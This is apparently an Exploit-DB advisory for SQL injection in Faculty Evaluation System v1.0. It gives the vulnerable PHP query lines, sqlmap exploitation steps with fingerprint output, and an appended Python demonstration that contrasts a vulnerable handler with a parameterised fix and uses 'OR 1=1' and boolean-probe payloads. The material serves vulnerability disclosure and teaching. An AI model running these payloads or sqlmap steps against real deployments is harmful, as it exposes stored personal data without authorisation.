Faculty Evaluation System v1.0 – SQL Injection

  • Author: Andrey Stoykov
    Date: 2023-07-07
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51573/
  • # Exploit Title: Faculty Evaluation System v1.0 - SQL Injection
    # Date: 07/2023
    # Exploit Author: Andrey Stoykov
    # Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
    # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/eval_2.zip
    # Version: 1.0
    # Tested on: Windows Server 2022
    
    
    SQLi #1
    
    File: edit_evaluation
    
    Line #4
    $qry = $conn->query("SELECT * FROM ratings where id = ".$_GET['id'])->fetch_array();
    [...]
    
    
    SQLi #2
    
    File: view_faculty.php
    
    Line #4
    
    // Add an "id" parameter after the "view_faculty" page parameter and set it to an integer
    [...]
    $qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();
    [...]
    
    
    Steps to Exploit:
    
    1. Log in to the application
    2. Browse to the following URI "http://host/eval/index.php?page=view_faculty&id=1"
    3. Capture the request in an intercepting proxy and save it to a file (test.txt below)
    4. Exploit using SQLMap
    
    
    sqlmap -r test.txt --threads 1 --dbms=mysql --fingerprint
    
    [...]
    [INFO] testing MySQL
    [INFO] confirming MySQL
    [INFO] the back-end DBMS is MySQL
    [INFO] actively fingerprinting MySQL
    [INFO] executing MySQL comment injection fingerprint
    back-end DBMS: active fingerprint: MySQL >= 5.7
     comment injection fingerprint: MySQL 5.6.49
     fork fingerprint: MariaDB
    [...]
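    The following is an added example, not code from the advisory or from the Faculty Evaluation System project. It stands in for the vulnerable view_faculty.php query (SQLi #2 above; SQLi #1 has the same shape) and for the boolean-based differential that step 4 relies on. An in-memory SQLite table replaces the project's MySQL database, `||` replaces MySQL's `concat()`, and the faculty rows, table layout and function names are all constructed for this example. The fixed handler uses a parameter placeholder and an integer check, which is the mysqli prepared-statement equivalent the PHP code lacks.

```python
"""Stand-in for the unquoted $_GET['id'] concatenation in view_faculty.php.

Constructed example: SQLite in place of MySQL, sample rows invented here.
"""
import sqlite3
from urllib.parse import parse_qs


def make_db():
    """Build a small faculty_list table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE faculty_list "
        "(id INTEGER PRIMARY KEY, firstname TEXT, lastname TEXT, email TEXT)"
    )
    conn.executemany(
        "INSERT INTO faculty_list VALUES (?, ?, ?, ?)",
        [
            (1, "Ada", "Lovelace", "ada@example.edu"),
            (2, "Alan", "Turing", "alan@example.edu"),
            (3, "Grace", "Hopper", "grace@example.edu"),
        ],
    )
    return conn


def view_faculty_vulnerable(conn, query_string):
    """Mirrors the advisory's pattern: the raw id is pasted into the SQL text.

    SQLite's || stands in for MySQL concat(firstname,' ',lastname).
    """
    raw_id = parse_qs(query_string).get("id", [""])[0]
    sql = (
        "SELECT *, firstname || ' ' || lastname AS name "
        "FROM faculty_list WHERE id = " + raw_id
    )
    return conn.execute(sql).fetchall()


def view_faculty_fixed(conn, query_string):
    """Hardened form: type check the input, then bind it as a parameter."""
    raw_id = parse_qs(query_string).get("id", [""])[0]
    if not raw_id.isdigit():
        # Anything that is not a plain integer never reaches the database.
        raise ValueError("id must be an integer")
    sql = (
        "SELECT *, firstname || ' ' || lastname AS name "
        "FROM faculty_list WHERE id = ?"
    )
    return conn.execute(sql, (int(raw_id),)).fetchall()


def _response(handler, conn, query_string):
    """Reduce a handler call to something comparable: rows, or an error marker."""
    try:
        return handler(conn, query_string)
    except ValueError:
        return "error"


def boolean_probe(handler, conn, base_id="1"):
    """The TRUE/FALSE differential behind sqlmap's boolean-based detection.

    If 'id=1 AND 1=1' and 'id=1 AND 1=2' yield different responses, the
    parameter is being evaluated as SQL rather than treated as data.
    """
    true_resp = _response(handler, conn, f"page=view_faculty&id={base_id} AND 1=1")
    false_resp = _response(handler, conn, f"page=view_faculty&id={base_id} AND 1=2")
    return true_resp != false_resp


if __name__ == "__main__":
    db = make_db()
    # Tautology dumps every faculty row through the vulnerable handler.
    print(view_faculty_vulnerable(db, "page=view_faculty&id=1 OR 1=1"))
    print("vulnerable injectable:", boolean_probe(view_faculty_vulnerable, db))
    print("fixed injectable:", boolean_probe(view_faculty_fixed, db))
```

    The probe only shows a difference in behaviour between the two payloads; against the real application the equivalent check is the request pair sqlmap sends in step 4, and the `--dbms=mysql --fingerprint` run above is what then narrows the backend version.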